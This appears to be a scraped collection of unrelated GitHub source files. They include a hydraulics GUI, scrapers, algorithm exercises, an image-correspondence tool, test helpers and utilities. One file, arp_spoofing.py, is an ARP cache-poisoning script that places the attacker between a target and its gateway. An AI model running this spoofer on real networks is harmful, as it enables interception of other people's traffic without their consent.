s1.configure(font=f_H12,command=ACT)
s1.grid(row=0, column=0,sticky='W')
s1.select()
s2 = tk.Radiobutton(frame02,text="Rectangular Section",padx=10,variable=sec,value=2,indicatoron=1)
s2.configure(font=f_H12,command=ACT)
s2.grid(row=1, column=0,sticky='W')
s3 = tk.Radiobutton(frame02,text="Irregular Section",padx=10,variable=sec,value=3,indicatoron=1)
s3.configure(font=f_H12,command=ACT)
s3.grid(row=2, column=0,sticky='W')
###Geometry inputs
#Circular Section
dd = tk.Label(frame02,text="Diameter",font=f_H12,justify="left")
dd.grid(row=3,column=0,padx=20,pady = 5)
ddu = tk.Label(frame02,text="[m]",font=f_H12)
ddu.grid(row=3,column=2,padx=10,pady=5)
D_ = tk.StringVar()
d = tk.Entry(frame02,textvariable=D_,width=6,justify="center",font=f_H12)
d.grid(row=3,column=1,padx=10,pady=5)
d.insert('end',0)
d.config(state='normal')
#Rectangular section
#Width
ww = tk.Label(frame02,text="Width",font=f_H12,justify="left")
ww.grid(row=5,column=0,padx=20,pady = 5)
wwu = tk.Label(frame02,text="[m]",font=f_H12)
wwu.grid(row=5,column=2,padx=20,pady=5)
W_ = tk.StringVar()
w = tk.Entry(frame02,textvariable=W_,width=6,justify="center",font=f_H12)
w.grid(row=5,column=1,padx=10,pady=5)
w.insert('end',0)
w.config(state='disabled')
#Height
hh = tk.Label(frame02,text="Height",font=f_H12,justify="left")
hh.grid(row=6,column=0,padx=20,pady = 5)
hhu = tk.Label(frame02,text="[m]",font=f_H12,justify="left")
hhu.grid(row=6,column=2,padx=20,pady = 5)
H_ = tk.StringVar()
h = tk.Entry(frame02,textvariable=H_ , width=6,justify="center",font=f_H12)
h.grid(row=6,column=1,padx=10,pady=5)
h.insert('end',0)
h.config(state='disabled')
#Irregular section
#Area
AA = tk.Label(frame02,text="Area",font=f_H12,justify="left")
AA.grid(row=7,column=0,padx=20,pady = 5)
AAU = tk.Label(frame02,text="[m\xb2]",font=f_H12)
AAU.grid(row=7,column=2,padx=20,pady=5)
A_ = tk.StringVar()
a = tk.Entry(frame02,textvariable=A_,width=6,justify="center",font=f_H12)
a.grid(row=7,column=1,padx=10,pady=5)
a.insert('end',0)
a.config(state='disabled')
#Perimeter
PP = tk.Label(frame02,text="Perimeter",font=f_H12,justify="left")
PP.grid(row=8,column=0,padx=20,pady = 5)
PPU = tk.Label(frame02,text="[m]",font=f_H12,justify="left")
PPU.grid(row=8,column=2,padx=20,pady = 5)
P_ = tk.StringVar()
p = tk.Entry(frame02,textvariable=P_ , width=6,justify="center",font=f_H12)
p.grid(row=8,column=1,padx=10,pady=5)
p.insert('end',0)
p.config(state='disabled')
#label at startup
ww.config(fg='gray')
wwu.config(fg='gray')
hh.config(fg='gray')
hhu.config(fg='gray')
PP.config(fg='gray')
PPU.config(fg='gray')
AA.config(fg='gray')
AAU.config(fg='gray')
#Formulation selection CooleBrookWhite or SixParamters equation
modForm = tk.IntVar()
for1 = tk.Radiobutton(frame04, text="Colebrook-White Equation", padx = 10, variable=modForm , value=1, font=f_H12)
for1.grid(row=4, column=0, sticky='W')
for1.configure(command=ACTF2, indicatoron=1)
for1.select()
for1.configure(state='normal')
for2 = tk.Radiobutton(frame04,text="Six-Factors Equation", padx = 10, variable=modForm, value=2,font=f_H12)
for2.grid(row=4,column=1,sticky='W')
for2.configure(command=ACTF2)
for2.config(fg='gray')
link = tk.Label(frame04,text="References", padx = 5, font = f_Ref, fg='#000080')
link.grid(row=4,column=2,sticky='W')
link.bind("<Button-1>", lambda e: callback("https://doi.org/10.1002/aic.16535"))
# #Results
VarList = ['Density [kg/m\xb3]','Specific weight [N/m\xb3]','Dinamic viscosity [Pa s]','Kinematic viscosity [m\xb2/s]',
'Hydraulic Diameter [m]','Reynolds [-]','Skin Friction [-]','Specific Head-Loss [m/m]','Head-Loss [m]',
'Head-Loss [Pa]']
for i,var in enumerate(VarList):
tk.Label(frame03,text=var,font=f_H12).grid(row=i,column=0,sticky="E",pady=11)
tk.Frame(frame03,height=35,width=150, colormap="new",relief="sunken",bd=2).grid(row=i,column=1,sticky="E",padx=18,pady=11)
###############Buttons
##s3 = tk.Button(frame05,text='Roughness Table', command=table,font=f_H12)
##s3.config(height=1, width=15)
##s3.grid(row=0,column=0,padx=10,pady=10,ipadx=20)
s4 = tk.Button(frame05,text="Calculate",command=CAL,font=f_H12)
s4.config( height = 1, width = 15)
s4.grid(row=0,column=1,padx=10,pady=10,ipadx=20)
s5 = tk.Button(frame05,text="EXIT",command=EX_out,font=f_H12)
s5.config( height = 1, width = 15)
s5.grid(row=0,column=2,padx=10,pady=10,ipadx=20)
######################
root.mainloop()
| vicio1975/SkinFriction-HeadLoss | SkinFriction_Loss_4.pyw | SkinFriction_Loss_4.pyw | pyw | 23,967 | python | en | code | 5 | github-code | 36 |
21407967690 | import requests
'''
r = requests.get("http://www.google.com")
r.encoding = 'utf-8'
s = r.text
print(s)
'''
def getText(url):
try:
r = requests.get(url, timeout = 500)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.text
except:
return "Erroroccur!"
if __name__ == "__main__":
url = "http://www.bilibili.com"
print(getText(url)) | zIDAedgen/crawlerAirbnb | venv/include/spider.py | spider.py | py | 402 | python | en | code | 0 | github-code | 36 |
178011559 | class Solution(object):
def peakIndexInMountainArray(self, A):
"""
:type A: List[int]
:rtype: int
"""
def helper(A, l, h):
m = (l + h) // 2
if A[m] > max(A[m + 1], A[m - 1]):
return m
elif A[m] < A[m + 1]:
return helper(A, m + 1, h)
elif A[m] < A[m - 1]:
return helper(A, l, m - 1)
return helper(A, 0, len(A) - 1)
def peakIndexInMountainArrayIterate(self, A):
l, h = 0, len(A) - 1
# the problem was set up such that a peak must exist
while True:
m = (l + h) // 2
if A[m] > max(A[m + 1], A[m - 1]):
return m
elif A[m] < A[m + 1]:
l = m + 1
elif A[m] < A[m - 1]:
h = m - 1
def peakIndexInMountainArrayIterateBad(self, A):
lo, hi = 0, len(A) - 1
while lo < hi:
mi = (lo + hi) / 2
if A[mi] < A[mi + 1]:
# peak is on the right
lo = mi + 1
else:
# peak is on the left (mid may be the peak)
hi = mi
return lo
solver = Solution()
ans = solver.peakIndexInMountainArrayIterate([0,1,2,3,0])
print(ans) | iguy0/Data-Science-Toolbox | algorithm/binary_search/852_Peak_Index_in_a_Mountain_Array.py | 852_Peak_Index_in_a_Mountain_Array.py | py | 1,296 | python | en | code | null | github-code | 36 |
32657811309 | lista = []
for j in range(0, 10):
lista.append(input(f'Insira o numero {j + 1 } da lista: '))
i = 0
i2 = len(lista)
while True:
print(f'{lista[i]} -- {lista[i2 - 1]}')
i += 1
i2 -= 1
if (i2 == 0):
break
| caiovale1921/Estrutura-de-Dados | Lista-Exercicios-11-03-2022/Vetor/ex01.py | ex01.py | py | 243 | python | it | code | 0 | github-code | 36 |
2649303866 | import time
import scapy.all as scapy
from scapy.layers.l2 import ARP as ARP
from scapy.layers.l2 import Ether as Ether
def get_mac(ip):
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=2, verbose=False)[0]
return answered_list[0][1].hwsrc
def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = ARP(op=2, pdst=target_ip, pdsrt=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
target_ip = input("Enter the Target ip : ")
gateway_ip = input("Enter the Gateway ip : ")
sent_packet = 0
try:
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packet += 2
print("\r[+] Packets send = " + str(sent_packet), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\nResetting changes..........")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
| CrashNBurn1337/ArpSpoofer | arp_spoofing.py | arp_spoofing.py | py | 1,297 | python | en | code | 0 | github-code | 36 |
23243623755 | import cv2
import numpy as np
import tkinter as tk
from tkinter import filedialog
def load_correspondences(file_name):
try:
f = open(file_name, "r")
lines = f.readlines()
lines = [l.rstrip() for l in lines]
f.close()
points1 = []
points2 = []
for line in lines:
x1,y1,x2,y2 = line.split(',')
x1,y1,x2,y2 = int(x1), int(y1), int(x2), int(y2)
points1.append( [x1, y1])
points2.append( [x2, y2])
points1 = np.array(points1, np.float32)
points2 = np.array(points2, np.float32)
return points1, points2
except Exception as e:
print(e)
print('Cannot read file',file_name)
return False, True
def record_click(event, x, y, flags, params):
# checking for left mouse clicks
if event == cv2.EVENT_LBUTTONDOWN:
postitions, marker_color, image, window_name = params
font = cv2.FONT_HERSHEY_SIMPLEX
#append coordinates of click
postitions.append( [x, y] )
#increment counter
count = len(postitions)
cv2.putText(image, str(count) , (x,y), font,
0.75, marker_color, 2)
cv2.imshow(window_name, image)
def write_correspondence_to_file(file_name, first_positions, second_positions):
f = open(file_name,"w")
for i in range(len(first_positions)):
p1, p2 = first_positions[i], second_positions[i]
x1, y1 = p1
x2, y2 = p2
x1,y1,x2,y2 = int(x1), int(y1), int(x2), int(y2)
line = f'{x1},{y1},{x2},{y2}\n'
f.write(line)
f.close()
def get_image_path(title):
root = tk.Tk()
dummy = root.withdraw()
image_path = filedialog.askopenfilename(initialdir = ".",title = title,filetypes = (("all files","*.*"),("png files","*.png"),("jpg files","*.jpg"),("jpeg files","*.jpeg")))
return image_path
def get_correspondences(image1_path, image2_path, points_filename='points.txt'):
first_image = cv2.imread(image1_path, 1)
second_image = cv2.imread(image2_path,1)
# displaying the image
first_window_name = 'First Image'
second_window_name = 'Second Image'
cv2.imshow(first_window_name, first_image)
cv2.imshow(second_window_name, second_image)
#setting up parameters to be passed to the mouse click event callback for each window
first_image_positions = [] #list of points in first image
first_color = (255, 0, 0) #mark the points in blue for first image
second_image_positions = []
second_color = (0, 0, 255) # mark points in red for the second image
first_window_param = (first_image_positions, first_color, first_image, first_window_name)
second_window_param = (second_image_positions, second_color, second_image, second_window_name)
cv2.setMouseCallback(first_window_name, record_click,param=first_window_param )
cv2.setMouseCallback(second_window_name, record_click,param=second_window_param )
# wait for a key to be pressed to exit
cv2.waitKey(0)
# close the window
cv2.destroyAllWindows()
#ignore points that have no correspondence
length = min(len(first_image_positions), len(second_image_positions))
first_image_positions = first_image_positions[0:length]
second_image_positions = second_image_positions[0:length]
first_image_positions = np.array(first_image_positions, np.float32)
second_image_positions = np.array(second_image_positions, np.float32)
return first_image_positions, second_image_positions
| marwansalem/image-stitching | correspondences.py | correspondences.py | py | 3,583 | python | en | code | 0 | github-code | 36 |
34160025736 |
from re import findall;
with open('Day_22_Input.txt') as file:
pattern = 'x\d+|y\d+|\d+T|\d+%';
grid = [[0 for j in range(33)] for i in range(30)];
for line in file:
data = findall(pattern, line.strip());
if len(data) != 0:
x = int(data[0][1:]);
y = int(data[1][1:]);
size = int(data[2][:-1]);
used = int(data[3][:-1]);
available = int(data[4][:-1]);
grid[y][x] = [size, used, available];
if used == 0:
print((x, y));
for y in range(30):
for x in range(33):
if (x == 0) and (y == 0):
print('(.)', end = '');
elif (x == 32) and (y == 0):
print(' G ', end = '');
elif grid[y][x][1] == 0:
print('---', end = '');
else:
pair_found = 0;
for y2 in range(30):
for x2 in range(33):
if grid[y2][x2][2] >= grid[y][x][1]:
pair_found = 1;
if pair_found:
print(' . ', end = '');
else:
print(' # ', end = '');
print();
# 70 to move empty space next to goal data
# 155? to move to 0,0 | segloff23/Advent-of-Code-2016-Challenge | Day_022/Day_22_Part_2.py | Day_22_Part_2.py | py | 1,250 | python | en | code | 0 | github-code | 36 |
7625551099 | from bs4 import BeautifulSoup as bs
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
driver = webdriver.Edge(executable_path = r'Path of msedgedriver here')
url = "YOUTUBE URL HERE"
driver.get(url)
elem = driver.find_element_by_tag_name('html')
elem.send_keys(Keys.END)
time.sleep(3)
elem.send_keys(Keys.END)
innerHTML = driver.execute_script("return document.body.innerHTML")
page_soup = bs(innerHTML, 'html.parser')
res = page_soup.find_all('a',{'id':'video-title'})
titles = []
for video in res:
print(video.get('title'))
if video.get('title') != None:
titles.append((video.get('title')))
file = open('YoutubeList.txt','w+', encoding="utf-8")
for title in titles:
file.write(title+'\n')
file.close()
driver.close()
| Hiperultimate/Youtube-Playlist-Save-Title | youtubeListMaker.py | youtubeListMaker.py | py | 824 | python | en | code | 0 | github-code | 36 |
3147265908 | """
Common Flitter initialisation
"""
import logging
import sys
from loguru import logger
try:
import pyximport
pyximport.install()
except ImportError:
pass
LOGGING_LEVEL = "SUCCESS"
LOGGING_FORMAT = "{time:HH:mm:ss.SSS} {process}:{extra[shortname]:16s} | <level>{level}: {message}</level>"
class LoguruInterceptHandler(logging.Handler):
@classmethod
def install(cls):
handler = cls()
logging.basicConfig(handlers=[handler], level=0)
return handler
def uninstall(self):
logging.getLogger().removeHandler(self)
def emit(self, record):
try:
level = logger.level(record.levelname).name
except ValueError:
level = record.levelno
frame, depth = logging.currentframe().f_back, 1
while frame.f_code.co_filename == logging.__file__:
frame = frame.f_back
depth += 1
logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())
def configure_logger(level=None):
global LOGGING_LEVEL
if level is None:
level = LOGGING_LEVEL
else:
LOGGING_LEVEL = level
logger.configure(handlers=[dict(sink=sys.stderr, format=LOGGING_FORMAT, level=level, enqueue=True)],
patcher=lambda record: record['extra'].update(shortname=record['name'].removeprefix('flitter')))
LoguruInterceptHandler.install()
return logger
def name_patch(logger, name):
return logger.patch(lambda record, name=name: (record.update(name=name),
record['extra'].update(shortname=name.removeprefix('flitter'))))
| jonathanhogg/flitter | src/flitter/__init__.py | __init__.py | py | 1,653 | python | en | code | 8 | github-code | 36 |
13712488384 | import os
from os.path import join
from os.path import dirname
import shutil
import sys
from threading import Thread
import time
import zmq
import yaml
def get_pyneal_scanner_test_paths():
""" Return a dictionary with relevant paths for the pyneal_scanner_tests
within the `tests` dir
"""
# set up directory structure
testingDir = dirname(dirname(os.path.abspath(__file__))) # path to `tests` dir
pynealDir = dirname(testingDir)
pynealScannerDir = join(pynealDir, 'pyneal_scanner')
testDataDir = join(testingDir, 'testData')
GE_dir = join(testDataDir, 'GE_env')
GE_funcDir = join(GE_dir, 'funcData')
Philips_dir = join(testDataDir, 'Philips_env')
Philips_funcDir = join(Philips_dir, 'funcData')
Siemens_dir = join(testDataDir, 'Siemens_env')
Siemens_funcDir = join(Siemens_dir, 'funcData')
# store paths in dict
paths = {}
paths['pynealDir'] = pynealDir
paths['pynealScannerDir'] = pynealScannerDir
paths['testDataDir'] = testDataDir
paths['GE_dir'] = GE_dir
paths['GE_funcDir'] = GE_funcDir
paths['Philips_dir'] = Philips_dir
paths['Philips_funcDir'] = Philips_funcDir
paths['Siemens_dir'] = Siemens_dir
paths['Siemens_funcDir'] = Siemens_funcDir
return paths
def createFakeSeriesDir(newSeriesDir):
""" Mimic the creation of a new series directory at the start of the scan.
Parameters
----------
newSeriesDir : string
full path for the new series directory you'd like to create
"""
if not os.path.isdir(newSeriesDir):
os.makedirs(newSeriesDir)
def copyScanData(srcDir, dstDir):
""" copy the contents of srcDir to dstDir """
for f in os.listdir(srcDir):
if os.path.isfile(join(srcDir, f)):
shutil.copy(join(srcDir, f), dstDir)
### Functions for updating and cleaning the test scannerConfig.yaml files
def replace_scannerConfig_sessionDir(configFile, newSessionDir):
""" Write newSessionDir to the scannerSessionDir field of given scannerConfig file
In order to run these tests, the `scannerConfig.yaml` file for every
scanner enviorment in the testData directory needs to be updated to reflect
the local path to the scannerSessionDir. Since that varies depending on where
this test is being run from, this function will swap out that field with
the current path base on the local path to the pynealDir
"""
# read in contents of existing yaml file
with open(configFile, 'r') as ymlFile:
configSettings = yaml.safe_load(ymlFile)
# update with new setting
configSettings['scannerSessionDir'] = newSessionDir
# overwrite yaml file
with open(configFile, 'w') as ymlFile:
yaml.dump(configSettings, ymlFile, default_flow_style=False)
def cleanConfigFile(configFile):
""" Remove local paths from scannerConfig file.
After testing, remove the local path to the scannerSessionDir to it does
not get pushed to gitHub
"""
with open(configFile, 'r') as ymlFile:
configSettings = yaml.safe_load(ymlFile)
# clear existing scannerSessionDir
configSettings['scannerSessionDir'] = ' '
# overwrite yaml file
with open(configFile, 'w') as ymlFile:
yaml.dump(configSettings, ymlFile, default_flow_style=False)
### Class for creating a simple server to simulate Pyneal receiving socket
class SimRecvSocket(Thread):
def __init__(self, host, port, nVols):
Thread.__init__(self)
self.host = host
self.port = port
self.nVols = nVols
self.alive = True
self.receivedVols = 0
def run(self):
host = '*'
self.context = zmq.Context.instance()
sock = self.context.socket(zmq.PAIR)
sock.bind('tcp://{}:{}'.format(host, self.port))
# wait for initial contact
while True:
msg = sock.recv_string()
sock.send_string(msg)
break
while self.alive:
# receive header info as json
volInfo = sock.recv_json(flags=0)
# retrieve relevant values about this slice
volIdx = volInfo['volIdx']
volDtype = volInfo['dtype']
volShape = volInfo['shape']
# receive data stream
data = sock.recv(flags=0, copy=False, track=False)
voxelArray = np.frombuffer(data, dtype=volDtype)
voxelArray = voxelArray.reshape(volShape)
# send response
sock.send_string('got it')
self.receivedVols += 1
if self.receivedVols == self.nVols:
self.alive = False
def stop(self):
self.context.destroy()
self.alive = False
class ServerTest(Thread):
def __init__(self):
Thread.__init__(self)
self.alive = True
def run(self):
context = zmq.Context.instance()
self.socket = context.socket(zmq.PAIR)
self.socket.bind('tcp://*:5555')
while self.alive:
msg = self.socket.recv_string()
self.socket.send_string(msg)
if msg == 'end':
self.alive = False
def stop(self):
self.alive = False
| jeffmacinnes/pyneal | tests/pyneal_scanner_tests/pynealScanner_helper_tools.py | pynealScanner_helper_tools.py | py | 5,196 | python | en | code | 30 | github-code | 36 |
34399989971 | from typing import List
from entity.MountAnimal import MountAnimal
class Camel(MountAnimal):
bent_quantity: int
def __init__(self, id: str, name: str, date_of_birth: str, commands: List[str], bent_quantity: int):
super().__init__(id, name, date_of_birth, commands)
self.bent_quantity = bent_quantity
def to_dict(self) -> dict:
return {
"type": "camel",
"id": self.id,
"name": self.name,
"date_of_birth": self.date_of_birth,
"bent_quantity": self.bent_quantity,
"commands": self.commands
}
@classmethod
def from_json(cls, json_object):
id = json_object["id"]
name = json_object["name"]
date_of_birth = json_object["date_of_birth"]
commands = json_object["commands"]
bent_quantity = int(json_object["bent_quantity"])
return cls(id, name, date_of_birth, commands, bent_quantity)
def spit(self):
print("Yackh!")
| G0ncharovAA/GB_FINAL_TEST | app/entity/Camel.py | Camel.py | py | 1,030 | python | en | code | 0 | github-code | 36 |
6798954451 | import re
import datetime
from datetime import timedelta
from django.utils import timezone
from django.conf import settings
from django.contrib.auth.models import Permission
from django.shortcuts import get_object_or_404
from exo_role.models import ExORole
from auth_uuid.jwt_helpers import _build_jwt
from auth_uuid.tests.test_mixin import RequestMockAccount
from languages.models import Language
from utils.faker_factory import faker
from ..faker_factories import (
FakeOpportunityFactory,
FakeQuestionFactory,
)
class OpportunityTestMixin:
def get_sow_data(self):
return {
'title': faker.text(),
'description': faker.text(),
'mode': settings.OPPORTUNITIES_CH_MODE_DEFAULT,
'location': faker.city(),
'start_date': datetime.date.today(),
'end_date': datetime.date.today() + datetime.timedelta(days=20),
'duration_unity': settings.OPPORTUNITIES_DURATION_UNITY_DAY,
'duration_value': 2,
'start_time': faker.time(),
'timezone': faker.timezone(),
'entity': faker.name(),
'budgets': [
{
'budget': '222',
'currency': settings.OPPORTUNITIES_CH_CURRENCY_DOLLAR
}
],
}
def get_api_data(self, users=[]):
keywords = [
{'name': faker.word() + faker.numerify()},
{'name': faker.word() + faker.numerify()},
]
data = {
'title': faker.word(),
'description': faker.text(),
'mode': settings.OPPORTUNITIES_CH_MODE_ONSITE,
'location': '{}, {}'.format(faker.city(), faker.country()),
'exo_role': ExORole.objects.get(code=settings.EXO_ROLE_CODE_OTHER_OTHER).code,
'other_category_name': faker.word(),
'other_role_name': faker.word(),
'certification_required': None,
'due_date': timezone.now().date(),
'deadline_date': (timezone.now() + timedelta(days=10)).date(),
'duration_unity': settings.OPPORTUNITIES_DURATION_UNITY_DAY,
'duration_value': 2,
'num_positions': 2,
'keywords': keywords,
'entity': faker.company(),
'files': [{
'filestack_status': 'Stored',
'url': 'https://cdn.filestackcontent.com/Lr59QG8oQRWliC6x70cx',
'filename': 'gato.jpg',
'mimetype': 'image/jpeg'}],
'budgets': [
{
'currency': settings.OPPORTUNITIES_CH_CURRENCY_EUR,
'budget': '{}.0'.format(int(faker.numerify()))
},
{
'currency': settings.OPPORTUNITIES_CH_CURRENCY_EXOS,
'budget': '{}.0'.format(int(faker.numerify()))
},
]
}
if users:
data['target'] = settings.OPPORTUNITIES_CH_TARGET_FIXED
data['users_tagged'] = [
{'user': user.uuid.__str__()} for user in users
]
return data
def add_marketplace_permission(self, user):
perm = settings.AUTH_USER_PERMS_MARKETPLACE_FULL
permission = get_object_or_404(
Permission,
codename=perm)
user.user_permissions.add(permission)
def create_opportunity(
self, user=None, questions=3, num_positions=3, target=None,
duration_unity=None, role=None, group=None,
):
if not user:
user = self.super_user
data = {
'user_from': user,
'num_positions': num_positions,
}
if target:
data['target'] = target
if duration_unity:
data['duration_unity'] = duration_unity
if role:
data['exo_role'] = role
if group:
data['group'] = group
opportunity = FakeOpportunityFactory.create(**data)
languages = [
Language.objects.create(name=faker.word() + faker.numerify()) for _ in range(2)]
opportunity.languages.add(*languages)
FakeQuestionFactory.create_batch(size=questions, opportunity=opportunity)
return opportunity
def init_mock(self, m):
matcher = re.compile('{}/api/accounts/me/'.format(settings.EXOLEVER_HOST))
m.register_uri(
'GET',
matcher,
json=mock_callback)
m.register_uri(
'GET',
re.compile(
'{}/api/consultant/consultant/can-receive-opportunities/'.format(
settings.EXOLEVER_HOST)),
json=[])
m.register_uri(
'GET',
re.compile(
'{}/api/accounts/groups/{}/'.format(
settings.EXOLEVER_HOST,
settings.OPPORTUNITIES_DELIVERY_MANAGER_GROUP)),
json={'user_set': []})
m.register_uri(
'POST',
re.compile(
'{}{}api/mail/'.format(
settings.EXOLEVER_HOST,
settings.SERVICE_EXO_MAIL_HOST)),
json={})
def setup_credentials(self, user):
token = _build_jwt(user)
self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
def setup_username_credentials(self):
self.client.credentials(HTTP_USERNAME=settings.AUTH_SECRET_KEY)
request_mock_account = RequestMockAccount()
def mock_callback(request, context):
uuid = request.path.split('/')[-2]
return request_mock_account.get_request(uuid)
| tomasgarzon/exo-services | service-exo-opportunities/opportunities/tests/test_mixin.py | test_mixin.py | py | 5,626 | python | en | code | 0 | github-code | 36 |
6123602959 | import pandas as pd
from textslack.textslack import TextSlack
from gensim.models import doc2vec
# Architecture of the NLP Model
class NLPModel:
# The constructor instantiates all the variables that would be used throughout the class
def __init__(self, sp, conn, max_epochs=100, vec_size=50, alpha=0.025):
self.sp = sp
self.conn = conn
self.slack = TextSlack(variety='BrE', lang='english')
self.max_epochs = max_epochs
self.vec_size = vec_size
self.alpha = alpha
self.df = pd.read_sql_table('SPOTIFY_DATA', con=self.conn)
# Function that tags the list of words with indices
def _create_tagged_document(self, list_of_list_of_words):
for i, list_of_words in enumerate(list_of_list_of_words):
yield doc2vec.TaggedDocument(list_of_words, [i])
# Function to prepare the training data
def _training_data(self):
key_features = (self.df['album'] + ' ' + self.df['name'] + ' ' + self.df['artist']).tolist()
cleaned_key_features = self.slack.transform(key_features)
list_list_words = [sent.split() for sent in cleaned_key_features]
return list_list_words
# Function to build and train the model
def build_model(self):
list_list_words = self._training_data()
train_data = list(self._create_tagged_document(list_list_words))
model = doc2vec.Doc2Vec(size=self.vec_size,
alpha=self.alpha,
min_alpha=0.00025,
min_count=1,
dm=1)
model.build_vocab(train_data)
for epoch in range(self.max_epochs):
print('iteration {0}'.format(epoch))
model.train(train_data,
total_examples=model.corpus_count,
epochs=model.iter)
# decrease the learning rate
model.alpha -= 0.0002
# fix the learning rate, no decay
model.min_alpha = model.alpha
model.save('d2v.model')
print("Model Saved")
# Function to predict the most similar doc in the doc2vec model
def most_similar_doc(self, target):
model = doc2vec.Doc2Vec.load('d2v.model')
model.random.seed(95)
cleaned_target = self.slack.transform(target).split()
pred_vector = model.infer_vector(cleaned_target)
sim_vector = model.docvecs.most_similar([pred_vector])
pred_index = sim_vector[0][0]
return self.df.loc[pred_index, self.df.columns[6:-1]]
| CUTR-at-USF/muser-data-analysis | AI/models.py | models.py | py | 2,575 | python | en | code | 0 | github-code | 36 |
4153153837 | import datetime
import difflib
import os
from inspect import isabstract
from typing import Any, List, Mapping, Optional, Set, Tuple, Type
import ee # type: ignore
from requests.structures import CaseInsensitiveDict
config_path = os.path.expanduser("~/.config/taskee.ini")
def initialize_earthengine() -> None:
"""Initialize the Earth Engine API."""
try:
ee.Initialize()
except ee.EEException:
ee.Authenticate()
ee.Initialize()
def _get_case_insensitive_close_matches(
word: str, possibilities: List[str], n: int = 3, cutoff: float = 0.6
) -> List[str]:
"""A case-insensitive wrapper around difflib.get_close_matches.
Parameters
----------
word : str
A string for which close matches are desired.
possibilites : List[str]
A list of strings against which to match word.
n : int, default 3
The maximum number of close matches to return. n must be > 0.
cutoff : float, default 0.6
Possibilities that don't score at least that similar to word are ignored.
Returns
-------
List[str] : The best (no more than n) matches among the possibilities are returned in
a list, sorted by similarity score, most similar first.
"""
lower_matches = difflib.get_close_matches(
word.lower(), [p.lower() for p in possibilities], n, cutoff
)
return [p for p in possibilities if p.lower() in lower_matches]
def _all_subclasses(cls: Type[Any]) -> Set[Type[Any]]:
"""Recursively find all subclasses of a given class."""
return set(cls.__subclasses__()).union(
[s for c in cls.__subclasses__() for s in _all_subclasses(c)]
)
def _list_subclasses(superclass: Type[Any]) -> Mapping[str, Type[Any]]:
"""List all non-abstract subclasses of a given superclass. Return as a dictionary mapping the
subclass name to the class. This is recursive, so sub-subclasses will also be returned.
Parameters
----------
superclass : Type[Any]
The superclass to list subclasses of.
Returns
-------
Dict[str, Type[Any]]
A dictionary mapping the subclass name to the class.
"""
return CaseInsensitiveDict(
{
cls.__name__: cls
for cls in _all_subclasses(superclass)
if not isabstract(cls)
}
)
def _get_subclasses(names: Tuple[str, ...], superclass: Type[Any]) -> Set[Type[Any]]:
"""Retrieve a set of subclasses of a given superclass.
Parameters
----------
names : Tuple[str, ...]
A tuple of subclass names to retrieve from the superclass.
superclass : Type[Any]
The superclass to retrieve subclasses of.
Returns
-------
Set[Type[Any]]
A set of subclasses of the superclass.
"""
options = _list_subclasses(superclass)
keys = list(options.keys())
if "all" in [name.lower() for name in names if isinstance(name, str)]:
return set(options.values())
selected = []
for name in names:
try:
selected.append(options[name])
except KeyError:
close_matches = _get_case_insensitive_close_matches(name, keys, n=3)
hint = " Close matches: {}.".format(close_matches) if close_matches else ""
raise AttributeError(
f'"{name}" is not a supported {superclass.__name__} type. Choose from {keys}.{hint}'
)
return set(selected)
def _millis_to_datetime(
millis: str, tz: Optional[datetime.timezone] = None
) -> datetime.datetime:
"""Convert a timestamp in milliseconds (e.g. from Earth Engine) to a datetime object."""
return datetime.datetime.fromtimestamp(int(millis) / 1000.0, tz=tz)
def _datetime_to_millis(dt: datetime.datetime) -> int:
"""Convert a datetime to a timestamp in milliseconds"""
return int(dt.timestamp() * 1000)
| aazuspan/taskee | taskee/utils.py | utils.py | py | 3,865 | python | en | code | 10 | github-code | 36 |
36208541438 | from django.urls import path
from proyecto.views import index_proyecto, ProyectoCreate, ProyectoList, ProyectoUpdate, ProyectoDelete, proyecto_list_total
app_name = 'proyecto'
urlpatterns = [
path("", index_proyecto, name="index_proyecto"),
path("registrar/", ProyectoCreate.as_view(), name="registrar_proyecto"),
path("listar/<int:id>", ProyectoList.as_view(), name="proyecto_listar"),
path('listaDeProyecto/', proyecto_list_total, name= 'lista_total'),
path("editar/<int:pk>", ProyectoUpdate.as_view(), name="editar_proyecto"),
path("eliminar/<int:pk>", ProyectoDelete.as_view(), name="eliminar_proyecto"),
] | joseiba/GestionSoftware | ProyectoIS2/Proyecto/proyecto/urls.py | urls.py | py | 636 | python | es | code | 0 | github-code | 36 |
28180715346 | from pathlib import Path
from .CUBEparser import parse_files
# yapf: disable
SHORTHAND_FUNCTIONALS = [
'svwn3',
'svwn5',
'pbe',
'pbe0',
'bpw91',
'bp86',
'b3p86',
'b3p86-g',
'blyp',
'b3lyp',
'b3lyp-g',
'olyp',
'kt1',
'kt2',
'kt3'
]
# yapf: enable
"""List of recognized shorthands for functionals"""
def write_scf_fock(user_dict, wf_dict, origin):
fock_dict = {}
# ZORA
if user_dict["WaveFunction"]["relativity"].lower() == "zora":
fock_dict["zora_operator"] = {
"include_nuclear": user_dict["ZORA"]["include_nuclear"],
"include_coulomb": user_dict["ZORA"]["include_coulomb"],
"include_xc": user_dict["ZORA"]["include_xc"],
}
# Kinetic
fock_dict["kinetic_operator"] = {"derivative": user_dict["Derivatives"]["kinetic"]}
# Nuclear
fock_dict["nuclear_operator"] = {
"proj_prec": user_dict["Precisions"]["nuclear_prec"],
"smooth_prec": user_dict["Precisions"]["nuclear_prec"],
"nuclear_model": user_dict["WaveFunction"]["nuclear_model"],
"shared_memory": user_dict["MPI"]["share_nuclear_potential"],
}
# Reaction
if user_dict["WaveFunction"]["environment"].lower() == "pcm":
fock_dict["reaction_operator"] = {
"poisson_prec": user_dict["world_prec"],
"kain": user_dict["PCM"]["SCRF"]["kain"],
"max_iter": user_dict["PCM"]["SCRF"]["max_iter"],
